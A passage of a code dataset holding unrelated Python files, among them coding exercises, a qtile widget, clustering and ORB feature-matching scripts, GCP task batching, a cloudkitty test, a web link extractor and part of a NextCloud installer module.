국어점수, 그다음은 수학점수이다.\t\t\t\t\t\n\t\t(예) \n\t\t\t1001번, 국어 100, 수학 20\n\t\t\t1002번, 국어 32, 수학 54\n\t\t\t1003번 국어 34, 수학 65\t\n\n\t\t[1] 전체 평균을 출력하시오.\n\t\t[2] 국어 1등 학생을 출력하시오.\n\t\t[3] 수학 1등 학생을 출력하시오.\n\t\t[4] 전체 1등 학생을 출력하시오.\n'''\n\na = [1001, 100, 20, 1002, 32, 54, 1003, 34, 65]\n\ntotal = 0\n\nkorMax = 0\nkorIndex = 0\n\nmathMax = 0\nmathIndex = 0\n\nfor i in range(len(a)) :\n if i % 3 == 1 :\n total += a[i]\n if korMax < a[i] :\n korMax = a[i]\n korIndex = i-1\n elif i % 3 == 2 :\n total += a[i]\n if mathMax < a[i] :\n mathMax = a[i]\n mathIndex = i-2\n \nprint(total)\navg = total / 3\nprint(f'전체 평균 = {avg:.2f}') # 파이썬의 toFixed()\nprint(f'국어 1등 학생 = {a[korIndex]}')\nprint(f'수학 1등 학생 = {a[mathIndex]}')\n\n","repo_name":"jomira0220/study","sub_path":"jomira/00_문법총정리/Python_문제풀기/일차배열/일차배열6/일차배열6_문제15_세트학생정보.py","file_name":"일차배열6_문제15_세트학생정보.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9813024480","text":"\nfrom set_config import config\nimport time\ndef get_post_data_goodstopn(new_image_paths):\n if len(new_image_paths)<1:\n return None,None\n api = config.http_apis['shelf_good_cluster_topn']\n img_local_files = ''\n for img_path in new_image_paths:\n img_local_files += img_path+\",\"\n trace_id = str(time.time())\n post_data = {\n \"trace_id\":trace_id,\n \"img_local_files\":img_local_files[:-1]\n }\n return api,post_data\n\ndef get_post_data_addgood(upc,image_path,goods_shelfgoods_id):\n trace_id = str(time.time())\n post_data = {\n \"trace_id\": trace_id,\n \"img_local_file\":image_path,\n \"good_upc\":upc,\n \"goods_shelfgoods_id\":goods_shelfgoods_id\n }\n api = config.http_apis['shelf_good_add_good']\n return api,post_data\n\ndef get_post_data_deletegood(goods_shelfgoods_id):\n trace_id = str(time.time())\n post_data = {\n \"trace_id\": trace_id,\n \"goods_shelfgoods_id\": goods_shelfgoods_id,\n }\n api = config.http_apis['shelf_good_delete_good']\n return api, post_data\n\n\nif __name__=='__main__':\n new_image_paths=[\"/home/ai/1.jpg\",\"/home/ai/2.jpg\",\"/home/ai/3.jpg\"]\n api, post_data = get_post_data_goodstopn(new_image_paths)\n print (post_data)","repo_name":"huachao2017/goodsdl","sub_path":"goods/freezer/keras_yolo3/util/shelfgoods_util.py","file_name":"shelfgoods_util.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70759852969","text":"from libqtile import bar, 
hook, pangocffi\nfrom libqtile.widget import base\n\nclass WindowName(base._TextBox):\n def __init__(self, width=bar.STRETCH, **config):\n base._TextBox.__init__(self, width=width, **config)\n\n def _configure(self, qtile, bar):\n base._TextBox._configure(self, qtile, bar)\n hook.subscribe.client_name_updated(self.hook_response)\n hook.subscribe.current_screen_change(self.hook_response)\n hook.subscribe.focus_change(self.hook_response)\n hook.subscribe.float_change(self.hook_response)\n\n def remove_hooks(self):\n hook.unsubscribe.client_name_updated(self.hook_response)\n hook.unsubscribe.current_screen_change(self.hook_response)\n hook.unsubscribe.focus_change(self.hook_response)\n hook.unsubscribe.float_change(self.hook_response)\n\n def hook_response(self, *args):\n w = self.bar.screen.group.current_window\n state = \"\"\n if w:\n if w.floating:\n state = \"▪ \"\n var = {}\n var[\"state\"] = state\n var[\"name\"] = pangocffi.markup_escape_text(self.name_sub(w.name))\n wm_class = w.get_wm_class()\n var[\"class\"] = pangocffi.markup_escape_text(\n wm_class[0].upper() if wm_class else \"\")\n self.format = \"{classcolour}{class} {namecolour}{name} {state}\"\n if self.bar.screen == self.qtile.current_screen:\n var[\"classcolour\"] = \"\"\n var[\"namecolour\"] = \"\"\n else:\n var[\"classcolour\"] = \"\"\n var[\"namecolour\"] = \"\"\n\n text = self.format.format(**var)\n else:\n text = \"\"\n self.update(text)\n\n def name_sub(self, text):\n for string in [\" - qutebrowser\", \" — Mozilla Firefox\"]:\n text = text.replace(string, \"\")\n return text\n\n def finalize(self):\n self.remove_hooks()\n base._TextBox.finalize(self)\n","repo_name":"dairnarth/.dotfiles","sub_path":"stow/qtile/.config/qtile/modules/windowname.py","file_name":"windowname.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23395399338","text":"import numpy as np\r\nfrom scipy.sparse.linalg import svds\r\nfrom sklearn.cluster import SpectralClustering\r\nfrom sklearn.preprocessing import normalize\r\n\r\n\r\nclass EDSC_w:\r\n\r\n def __init__(self, n_clusters, regu_coef=1., n_neighbors=10, ro=0.5, save_affinity=False):\r\n \"\"\"\r\n\r\n :param n_clusters: number of clusters\r\n :param regu_coef: regularization coefficient i.e. 
lambda\r\n :param n_neighbors: number of neighbors of knn graph\r\n :param ro: post-processing parameters\r\n :param save_affinity: if True, save affinity matrix\r\n \"\"\"\r\n self.n_clusters = n_clusters\r\n self.regu_coef = regu_coef\r\n self.n_neighbors = n_neighbors\r\n self.ro = ro\r\n self.save_affinity = save_affinity\r\n\r\n\r\n def fit(self, X):\r\n X_ = np.transpose(X) # shape: n_dim * n_samples; the transpose is the actual data matrix X\r\n X_embedding = X_\r\n I = np.eye(X.shape[0])\r\n inv = np.linalg.inv(np.dot(np.transpose(X_embedding), X_embedding) + self.regu_coef * I)# inv is the matrix inverse\r\n C = np.dot(np.dot(inv, np.transpose(X_embedding)), X_)\r\n Coef = self.thrC(C, self.ro) #Efficient Dense Subspace Clustering\r\n y_pre, C_final = self.post_proC(Coef, self.n_clusters, 8, 18)#spectral clustering\r\n\r\n return y_pre\r\n\r\n def thrC(self, C, ro):\r\n if ro < 1:\r\n N = C.shape[1]\r\n Cp = np.zeros((N, N))\r\n S = np.abs(np.sort(-np.abs(C), axis=0))\r\n Ind = np.argsort(-np.abs(C), axis=0)\r\n for i in range(N):\r\n cL1 = np.sum(S[:, i]).astype(float)\r\n stop = False\r\n csum = 0\r\n t = 0\r\n while (stop == False):\r\n csum = csum + S[t, i]\r\n if csum > ro * cL1:\r\n stop = True\r\n Cp[Ind[0:t + 1, i], i] = C[Ind[0:t + 1, i], i]\r\n t = t + 1\r\n else:\r\n Cp = C\r\n return Cp\r\n\r\n\r\n def post_proC(self, C, K, d, alpha):# spectral clustering on C\r\n # C: coefficient matrix, K: number of clusters, d: dimension of each subspace\r\n C = 0.5 * (C + C.T)\r\n r = d * K + 1\r\n U, S, _ = svds(C, r, v0=np.ones(C.shape[0]))\r\n U = U[:, ::-1]\r\n S = np.sqrt(S[::-1])\r\n S = np.diag(S)\r\n U = U.dot(S)\r\n U = normalize(U, norm='l2', axis=1)\r\n Z = U.dot(U.T)\r\n Z = Z * (Z > 0)\r\n L = np.abs(Z ** alpha)\r\n L = L / L.max()\r\n L = 0.5 * (L + L.T)\r\n spectral = SpectralClustering(n_clusters=K, eigen_solver='arpack', affinity='precomputed',\r\n assign_labels='discretize')\r\n spectral.fit(L)\r\n grp = spectral.fit_predict(L) + 1\r\n return grp, L\r\n\r\n","repo_name":"compasszzn/subspace-clustering","sub_path":"method/EDSC_w.py","file_name":"EDSC_w.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72341380969","text":"#### Feature Extraction and Matching\n\nimport cv2\nimport numpy as np\nimport json\n\n# Load the camera parameters\ncamera_matrix = np.load(\"camera_matrix.npy\")\ndistortion_coeffs = np.load(\"distortion_coeffs.npy\")\n\n# Load the paths to the object images\nimage_paths = [\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img1.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img2.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img3.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img4.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img5.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img6.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img7.jpg\"\n # Add paths for the rest of the images\n]\n\n# Create feature detector and descriptor extractor\ndetector = cv2.ORB_create()\ndescriptor = cv2.ORB_create()\n\n# Initialize lists to store keypoints and descriptors\nkeypoints_list = []\ndescriptors_list = []\n\n# Loop through the images and extract features\nfor i, image_path in enumerate(image_paths):\n    print(f\"Processing image {i+1}/{len(image_paths)}\")\n    # Load the image\n    image = cv2.imread(image_path)\n    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n    # Undistort 
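On the `fit` method in the EDSC record above: it computes C = inv(D'D + lambda*I) @ (D'D) with an explicit matrix inverse, which is numerically worse than a factorization-based solve. A sketch of the equivalent step with `np.linalg.solve` (same shapes as the record, rows of `X` are samples); this is an illustration, not the repo's code:

import numpy as np

def edsc_coefficients(X, regu_coef=1.0):
    # X: n_samples x n_dim, as passed to fit() in the record.
    D = X.T                                  # the record's X_, n_dim x n_samples
    gram = D.T @ D                           # n_samples x n_samples
    A = gram + regu_coef * np.eye(X.shape[0])
    # solve(A, gram) == inv(A) @ gram, without ever forming inv(A)
    return np.linalg.solve(A, gram)

C = edsc_coefficients(np.random.rand(50, 8))
print(C.shape)  # (50, 50)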
the image using camera parameters\n undistorted_image = cv2.undistort(gray, camera_matrix, distortion_coeffs)\n\n # Detect keypoints and compute descriptors\n keypoints, descriptors = detector.detectAndCompute(undistorted_image, None)\n print(f\"Number of keypoints detected in image {i+1}: {len(keypoints)}\")\n\n # Store the keypoints and descriptors\n keypoints_list.append(keypoints)\n descriptors_list.append(descriptors)\n\n # Save keypoints as a JSON file\n keypoints_file = f\"keypoints_{i+1}.json\"\n keypoints_data = [(kp.pt, kp.size, kp.angle, kp.response, kp.octave, kp.class_id) for kp in keypoints]\n\n with open(keypoints_file, \"w\") as keypoints_output:\n json.dump(keypoints_data, keypoints_output)\n\n print(\"Keypoints saved as\", keypoints_file)\n\n # Save descriptors as a JSON file\n descriptors_file = f\"descriptors_{i+1}.json\"\n descriptors_data = descriptors.tolist()\n\n with open(descriptors_file, \"w\") as descriptors_output:\n json.dump(descriptors_data, descriptors_output)\n\n print(\"Descriptors saved as\", descriptors_file)\n\n# Initialize list to store matches\nmatches_list = []\n\n# Loop through pairs of images\nfor i in range(len(image_paths) - 1):\n print(f\"Matching features between images {i+1} and {i+2}\")\n # Match features between the current image and the next image\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = matcher.match(descriptors_list[i], descriptors_list[i+1])\n print(f\"Number of matches between images {i+1} and {i+2}: {len(matches)}\")\n\n # Store the matches\n matches_list.append(matches)\n\n# Save matches as a JSON file\nmatches_file = \"matches.json\"\nmatches_data = []\nfor matches in matches_list:\n matches_data.append([(match.queryIdx, match.trainIdx) for match in matches])\n\nwith open(matches_file, \"w\") as matches_output:\n json.dump(matches_data, matches_output)\n\nprint(\"Matches saved as\", matches_file)","repo_name":"AtharavJadhav/2D-3D","sub_path":"Feature_Extraction.py","file_name":"Feature_Extraction.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728479510","text":"#!/usr/bin/env python3\n#\n# euler33 / digit cancelling fractions\n\n\n##main loop\ntotalnum,totaldenom=1,1\nA=[str(j) for j in range(1,10)]\nfor i in range(11,100):\n s=str(i)\n for j in range(i+1,100):\n f=i/j\n t=str(j)\n for k in A:\n y=s.replace(k,'')\n z=t.replace(k,'')\n if y!='' and z!='' and int(y)!=0 and int(z)!=0 and int(y)!=int(s) and int(z)!=int(t):\n if f==(int(y)/int(z)):\n totalnum*=i\n totaldenom*=j\n\nprint(totalnum)\nprint(totaldenom)\n\n\n\n\n","repo_name":"allagonne/Euler_project","sub_path":"euler33.py","file_name":"euler33.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40710539392","text":"import logging\nfrom itertools import islice\nfrom google.appengine.api.taskqueue import TransientError, Queue, \\\n TaskAlreadyExistsError, DuplicateTaskNameError, TombstonedTaskError\nfrom google.appengine.runtime.apiproxy_errors import DeadlineExceededError\nfrom gcp_census.decorators import retry\n\n\nclass Tasks(object):\n\n @classmethod\n def split_every(cls, n, iterable):\n i = iter(iterable)\n piece = list(islice(i, n))\n while piece:\n yield piece\n piece = list(islice(i, n))\n\n @classmethod\n def schedule(cls, queue_name, tasks):\n queue = Queue(queue_name)\n batch_size = 100\n task_count = 0\n for task_batch 
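On the ORB feature-matching record above: with `crossCheck=True`, `BFMatcher.match` keeps only mutual nearest neighbours. A common alternative is Lowe's ratio test over `knnMatch`, which needs `crossCheck=False`. A sketch, assuming two overlapping grayscale images `img1.png` and `img2.png` exist on disk:

import cv2

img1 = cv2.imread("img1.png", cv2.IMREAD_GRAYSCALE)
img2 = cv2.imread("img2.png", cv2.IMREAD_GRAYSCALE)

orb = cv2.ORB_create()
kp1, des1 = orb.detectAndCompute(img1, None)  # des* may be None if no keypoints
kp2, des2 = orb.detectAndCompute(img2, None)

matcher = cv2.BFMatcher(cv2.NORM_HAMMING)     # crossCheck=False so knnMatch works
good = []
for pair in matcher.knnMatch(des1, des2, k=2):
    # Keep a match only when it is clearly better than the runner-up.
    if len(pair) == 2 and pair[0].distance < 0.75 * pair[1].distance:
        good.append(pair[0])
print(f"{len(good)} matches kept after the ratio test")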
in cls.split_every(batch_size, tasks):\n cls._add_single_batch(queue, task_batch)\n task_count += len(task_batch)\n if task_count > 0:\n logging.info(\"Scheduled %d tasks in max %d batches\",\n task_count, batch_size)\n\n @classmethod\n @retry((DeadlineExceededError, TransientError), tries=6, delay=2, backoff=2)\n def _add_single_batch(cls, queue, task_batch):\n if task_batch:\n try:\n queue.add(task_batch)\n logging.info(\"Scheduled %d tasks\", len(task_batch))\n except (DuplicateTaskNameError,\n TaskAlreadyExistsError,\n TombstonedTaskError) as ex:\n logging.warning(\"Task already added %s. Exception: %s\",\n task_batch, type(ex))\n","repo_name":"ocadotechnology/gcp-census","sub_path":"gcp_census/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"36506792938","text":"import flask\nimport uuid\n\nfrom unittest import mock\nimport voluptuous\n\nfrom cloudkitty.api.v2.summary import summary\nfrom cloudkitty import tests\n\nfrom cloudkitty.utils import tz as tzutils\n\n\nclass TestSummaryEndpoint(tests.TestCase):\n\n def setUp(self):\n super(TestSummaryEndpoint, self).setUp()\n self.endpoint = summary.Summary()\n\n def test_type_filter_is_passed_separately(self):\n policy_mock = mock.patch('cloudkitty.common.policy.authorize')\n\n flask.request.context = mock.Mock()\n flask.request.context.project_id = str(uuid.uuid4())\n flask.request.context.is_admin = True\n\n with mock.patch.object(self.endpoint._storage, 'total') as total_mock:\n with policy_mock, mock.patch('flask.request.args.lists') as fmock:\n total_mock.return_value = {'total': 0, 'results': []}\n fmock.return_value = [\n ('filters', 'a:b,type:awesome')]\n self.endpoint.get()\n total_mock.assert_called_once_with(\n begin=tzutils.get_month_start(),\n end=tzutils.get_next_month(),\n groupby=None,\n filters={'a': ['b']},\n metric_types=['awesome'],\n offset=0,\n limit=100,\n paginate=True,\n )\n\n def test_invalid_response_type(self):\n self.assertRaises(voluptuous.Invalid, self.endpoint.get,\n response_format=\"INVALID_RESPONSE_TYPE\")\n\n def test_generate_response_table_response_type(self):\n objects = [{\"a1\": \"obj1\", \"a2\": \"value1\"},\n {\"a1\": \"obj2\", \"a2\": \"value2\"}]\n\n total = {'total': len(objects),\n 'results': objects}\n\n response = self.endpoint.generate_response(\n summary.TABLE_RESPONSE_FORMAT, total)\n\n self.assertIn('total', response)\n self.assertIn('results', response)\n self.assertIn('columns', response)\n\n self.assertEqual(len(objects), response['total'])\n self.assertEqual(list(objects[0].keys()), response['columns'])\n self.assertEqual(\n [list(res.values()) for res in objects], response['results'])\n self.assertEqual(summary.TABLE_RESPONSE_FORMAT, response['format'])\n\n def test_generate_response_object_response_type(self):\n objects = [{\"a1\": \"obj1\", \"a2\": \"value1\"},\n {\"a1\": \"obj2\", \"a2\": \"value2\"}]\n\n total = {'total': len(objects),\n 'results': objects}\n\n response = self.endpoint.generate_response(\n summary.OBJECT_RESPONSE_FORMAT, total)\n\n self.assertIn('total', response)\n self.assertIn('results', response)\n self.assertNotIn('columns', response)\n\n self.assertEqual(len(objects), response['total'])\n self.assertEqual(objects, response['results'])\n self.assertEqual(summary.OBJECT_RESPONSE_FORMAT, 
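The `split_every` helper in the taskqueue record above is the classic `islice` batching idiom; on Python 3.12+ the stdlib ships the same thing as `itertools.batched`. A quick sketch of both:

from itertools import islice

def split_every(n, iterable):
    # Yield lists of up to n items, matching the record's generator.
    it = iter(iterable)
    while piece := list(islice(it, n)):
        yield piece

print(list(split_every(3, range(8))))  # [[0, 1, 2], [3, 4, 5], [6, 7]]

# Python 3.12+ equivalent (yields tuples rather than lists):
# from itertools import batched
# print(list(batched(range(8), 3)))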
response['format'])\n","repo_name":"openstack/cloudkitty","sub_path":"cloudkitty/tests/api/v2/summary/test_summary.py","file_name":"test_summary.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"53"}
{"seq_id":"72085522727","text":"lanternfishes = [int(x) for x in [line.strip().split(',') for line in open('input.txt', 'r')][0]]\n\n\ndef decrease_day(arr):\n to_increase = 0\n for i in range(len(arr)):\n if arr[i] == 0:\n arr[i] = 6\n to_increase +=1\n else:\n arr[i] -= 1\n for _ in range(to_increase):\n arr.append(8)\n\nfor i in range(256):\n decrease_day(lanternfishes)\n\nprint(len(lanternfishes))","repo_name":"GMainardi/Advent-2021","sub_path":"06/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"16334977903","text":"def prime(n):\n c=0\n for i in range(2,n):\n if (n%i==0):\n c=c+1\n break\n else:\n continue\n if(c==1):\n print(\"It is not a prime no.\")\n else:\n print(\"It is a prime no.\")\n\nn=int(input(\"Enter a number: \"))\nprime(n)\n","repo_name":"Autobahn1racer/Python_school","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"12711582832","text":"import requests\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nfrom colorama import Fore , init , Style\r\nlinks_file=open(\"links.txt\",\"w\")\r\nlink_count=0\r\ninit()\r\ndef extracting_all_links(url_req):\r\n global link_count\r\n try:\r\n response = requests.get(url_req).content\r\n html_soup = BeautifulSoup(response, 'html.parser')\r\n all_html_a = html_soup.find_all('a')\r\n for links in all_html_a:\r\n if ('href') in links.attrs:\r\n linkss = links['href']\r\n if (\"https://\") in linkss or (\"www.\") in linkss or (\"http\") in linkss:\r\n link_count+=1\r\n links_file.write(linkss+\"\\n\")\r\n print(linkss)\r\n links_file.close()\r\n init()\r\n print(f\"{Fore.GREEN}[+] Finished Links : {link_count}{Style.RESET_ALL}\")\r\n input(\"[!] Thanks For Using ..\")\r\n exit(0)\r\n except Exception:\r\n input(\"Error To URL !\")\r\nprint(f'''{Fore.YELLOW} |----------------------------------------|\r\n | [ Extractor Links In Website ] |\r\n | ----Github : TNALotaibi---- |\r\n |----------------------------------------| \r\n''')\r\nprint(f'''{Fore.YELLOW}[?] get -s target <---- if website encryption ( https:// ) \\n[?] get -n target <---- if website not encryption ( http:// ){Style.RESET_ALL}\\n''')\r\nprint(f\"{Fore.YELLOW}[+] Enter \")\r\ncommand = input(\"--> \")\r\nif not command.find(\"get -s\"):\r\n spp = command.split(\" -s \")[1]\r\n url_requests = f'https://{spp}'\r\n for _ in [\"|\", \"/\", \"-\", \"\\\\\", \"|\", \"/\", \"-\", \"\\\\\"]:\r\n time.sleep(0.2)\r\n print(f\"{Style.RESET_ALL}{Fore.LIGHTRED_EX}[{_}] Please wait .. 
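On the lanternfish record above (Advent of Code 2021, day 6): growing a list with one entry per fish is exponential and will not realistically finish 256 days. The standard fix is to count fish per timer value, which is constant space. A sketch:

from collections import deque

def simulate(timers, days):
    buckets = deque([0] * 9)      # buckets[t] = fish whose timer reads t (0..8)
    for t in timers:
        buckets[t] += 1
    for _ in range(days):
        spawning = buckets.popleft()  # fish at timer 0 reproduce today
        buckets[6] += spawning        # parents reset to 6
        buckets.append(spawning)      # offspring start at 8
    return sum(buckets)

print(simulate([3, 4, 3, 1, 2], 256))  # 26984457539 on the AoC example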
{url_requests}{Style.RESET_ALL}\",end=\"\\r\")\r\n extracting_all_links(url_requests)\r\nelse:\r\n input(\"Enter valid command !\")\r\n exit(0)\r\n","repo_name":"TNAlotaibi/Extractor-Links-In-Website","sub_path":"Extractor Links In Website.py","file_name":"Extractor Links In Website.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32687625050","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport os\nimport logging\nimport ebstall.errors as errors\nimport collections\nimport re\nimport requests\nimport ebstall.util as util\nimport types\nimport ebstall.osutil as osutil\nimport shutil\nimport time\nimport pkg_resources\n\nfrom ebstall.consts import PROVISIONING_SERVERS\nfrom ebstall.deployers import letsencrypt\n\n__author__ = 'dusanklinec'\nlogger = logging.getLogger(__name__)\n\n\nclass NextCloud(object):\n \"\"\"\n Nextcloud module\n \"\"\"\n WEBROOT = '/var/www/nextcloud'\n EXCLUDE_REINSTALL = ['data']\n\n def __init__(self, sysconfig=None, audit=None, write_dots=False, mysql=None, config=None, nginx=None, *args, **kwargs):\n self.sysconfig = sysconfig\n self.write_dost = write_dots\n self.audit = audit\n\n self.mysql = mysql\n self.config = config\n self.nginx = nginx\n\n self.webroot = self.WEBROOT\n self.user = 'nginx'\n self.hostname = None\n self.doing_reinstall = False\n\n self._file_nextcloud = 'nextcloud-11.0.3.zip'\n self._file_ojsxc = 'https://github.com/EnigmaBridge/jsxc-nc/archive/v3.2.0-2a.tar.gz'\n self._file_vpnauth = 'https://github.com/EnigmaBridge/user_vpnauth/archive/v1.0.1.tar.gz'\n\n def get_subdomains(self):\n \"\"\"\n Returns domains to register\n :return: \n \"\"\"\n return ['cloud']\n\n def get_domains(self):\n \"\"\"\n Full domains based on the hostname\n :return: \n \"\"\"\n return ['%s.%s' % (x, self.hostname) for x in self.get_subdomains()]\n\n def get_link(self):\n \"\"\"\n Returns the link to the main page\n :return: \n \"\"\"\n return 'https://%s/' % self.get_domains()[0]\n\n def get_extauth_endpoint(self):\n \"\"\"\n Returns endpoint for extauth plugin for ejabberd\n :return: \n \"\"\"\n domain = self.get_domains()[0]\n return 'https://%s/index.php/apps/ojsxc/ajax/externalApi.php' % domain\n\n #\n # Configuration\n #\n\n def _get_tls_paths(self):\n \"\"\"\n Returns chain & key path for TLS or None, None\n :return: keychain path, privkey path\n \"\"\"\n cert_dir = os.path.join(letsencrypt.LE_CERT_PATH, self.hostname)\n cert_path = os.path.join(cert_dir, letsencrypt.LE_CA)\n key_path = os.path.join(cert_dir, letsencrypt.LE_PRIVATE_KEY)\n return cert_path, key_path\n\n def _get_php_trusted_domains_template(self):\n \"\"\"\n Returns php file for changing owncloud settings\n :return: \n \"\"\"\n resource_package = __name__\n resource_path = '/'.join(('..', 'consts', 'nextcloud-trusteddomains.php'))\n return pkg_resources.resource_string(resource_package, resource_path)\n\n def _get_nginx_template(self):\n \"\"\"\n Returns static nginx config template\n :return: \n \"\"\"\n resource_package = __name__\n resource_path = '/'.join(('..', 'consts', 'nginx-nextcloud.conf'))\n return pkg_resources.resource_string(resource_package, resource_path)\n\n def _cfg_str(self, x):\n \"\"\"\n Returns empty string if is none\n :param x: \n :return: \n \"\"\"\n if x is None:\n return ''\n return '%s' % x\n\n def _get_nginx_cfg(self):\n \"\"\"\n Creates nginx configuration file\n :param env_path: \n :return: \n \"\"\"\n 
cert_path, key_path = self._get_tls_paths()\n tpl_file = self._get_nginx_template()\n tpl_file = tpl_file.replace('{{ DOMAINS }}', ','.join(self.get_domains()))\n tpl_file = tpl_file.replace('{{ TLS_CERT }}', self._cfg_str(cert_path))\n tpl_file = tpl_file.replace('{{ TLS_KEY }}', self._cfg_str(key_path))\n tpl_file = tpl_file.replace('{{ WEBROOT }}', self._cfg_str(self.webroot))\n\n # Remove all other templates not filled in\n tpl_file = re.sub(r'\\{\\{\\s*[a-zA-Z0-9_\\-]+\\s*\\}\\}', '', tpl_file)\n return tpl_file\n\n def configure(self):\n \"\"\"\n Configures Nginx\n :return: \n \"\"\"\n cfg_dir = self.nginx.http_include\n path = os.path.join(cfg_dir, 'nextcloud.conf')\n util.safely_remove(path)\n\n with util.safe_open(path, mode='w', chmod=0o644) as fh:\n fh.write(self._get_nginx_cfg()+'\\n')\n\n #\n # Installation\n #\n\n def _download_file(self, url, filename, attempts=1):\n \"\"\"\n Downloads binary file, saves to the file\n :param url:\n :param filename:\n :return:\n \"\"\"\n return util.download_file(url, filename, attempts)\n\n def _fix_privileges(self):\n \"\"\"\n Fixes privileges to the files\n :return: \n \"\"\"\n # Privileges\n storage_dir = os.path.join(self.webroot, 'storage', 'bootstrap', 'cache')\n cache_sub_dir = os.path.join(storage_dir, 'bootstrap', 'cache')\n if not os.path.exists(cache_sub_dir):\n os.makedirs(cache_sub_dir, mode=0o775)\n\n cmd = 'sudo chown %s -R \"%s\"' % (self.user, self.webroot)\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd)\n if ret != 0:\n raise errors.SetupError('Owner change failed for private space web')\n\n def _deploy_downloaded(self, archive_path, basedir):\n \"\"\"\n Analyzes downloaded file, deploys to the webroot\n :param archive_path:\n :param basedir:\n :return:\n \"\"\"\n cmd = 'sudo unzip %s' % util.escape_shell(archive_path)\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd, write_dots=True, cwd=basedir)\n if ret != 0:\n raise errors.SetupError('Could not extract update archive')\n\n folders = [f for f in os.listdir(basedir) if not os.path.isfile(os.path.join(basedir, f))\n and f != '.' 
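A side note on the nginx-template code above: the chain of `str.replace` calls plus the trailing `re.sub` that blanks unused `{{ ... }}` markers generalizes to one small helper. A sketch (a hypothetical helper, not part of the repo):

import re

PLACEHOLDER = re.compile(r"\{\{\s*([A-Za-z0-9_\-]+)\s*\}\}")

def render(template, values):
    # Fill known placeholders; unknown ones become '' as in the record's re.sub.
    return PLACEHOLDER.sub(lambda m: str(values.get(m.group(1), "")), template)

tpl = "server_name {{ DOMAINS }}; ssl_certificate {{ TLS_CERT }};"
print(render(tpl, {"DOMAINS": "cloud.example.org"}))
# server_name cloud.example.org; ssl_certificate ;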
and f != '..']\n\n if len(folders) != 1:\n raise errors.SetupError('Invalid folder structure after update extraction')\n\n archive_dir = os.path.join(basedir, folders[0])\n if not os.path.exists(archive_dir):\n raise errors.SetupError('Directory with nextcloud not found in the update archive: %s' % archive_dir)\n if not os.path.exists(os.path.join(archive_dir, 'robots.txt')):\n raise errors.SetupError('Invalid update archive, robots.txt not found in %s' % archive_dir)\n\n archive_slash = util.add_ending_slash(archive_dir)\n dest_slash = util.add_ending_slash(self.webroot)\n\n # reinstall - preserve user data\n excludes = ''\n if self.doing_reinstall:\n full_excludes = [os.path.join(dest_slash, x) for x in self.EXCLUDE_REINSTALL]\n if os.path.exists(dest_slash):\n for d in [x for x in full_excludes if not os.path.exists(x)]:\n os.makedirs(d)\n\n excludes = ' '.join(['--exclude %s' % util.escape_shell(util.add_ending_slash(x))\n for x in full_excludes])\n\n cmd = 'sudo rsync -av --delete %s %s %s' \\\n % (excludes, util.escape_shell(archive_slash), util.escape_shell(dest_slash))\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd, write_dots=True, cwd=basedir)\n if ret != 0:\n raise errors.SetupError('nextcloud sync failed')\n\n self._fix_privileges()\n\n def _install(self, attempts=3):\n \"\"\"\n Downloads NextCloud installation file from provisioning server.\n :return:\n \"\"\"\n base_file = self._file_nextcloud\n try:\n logger.debug('Going to download nextcloud from the provisioning servers')\n for provserver in PROVISIONING_SERVERS:\n url = 'https://%s/nextcloud/%s' % (provserver, base_file)\n tmpdir = util.safe_new_dir('/tmp/nextcloud-install')\n\n try:\n self.audit.audit_evt('prov-nextcloud', url=url)\n\n # Download archive.\n archive_path = os.path.join(tmpdir, base_file)\n self._download_file(url, archive_path, attempts=attempts)\n\n # Install\n self._deploy_downloaded(archive_path, tmpdir)\n return 0\n\n except errors.SetupError as e:\n logger.debug('SetupException in fetching NextCloud from the provisioning server: %s' % e)\n self.audit.audit_exception(e, process='prov-nextcloud')\n\n except Exception as e:\n logger.debug('Exception in fetching NextCloud from the provisioning server: %s' % e)\n self.audit.audit_exception(e, process='prov-nextcloud')\n\n finally:\n if os.path.exists(tmpdir):\n shutil.rmtree(tmpdir)\n\n return 0\n\n except Exception as e:\n logger.debug('Exception when fetching NextCloud')\n self.audit.audit_exception(e)\n raise errors.SetupError('Could not install NextCloud', cause=e)\n\n def 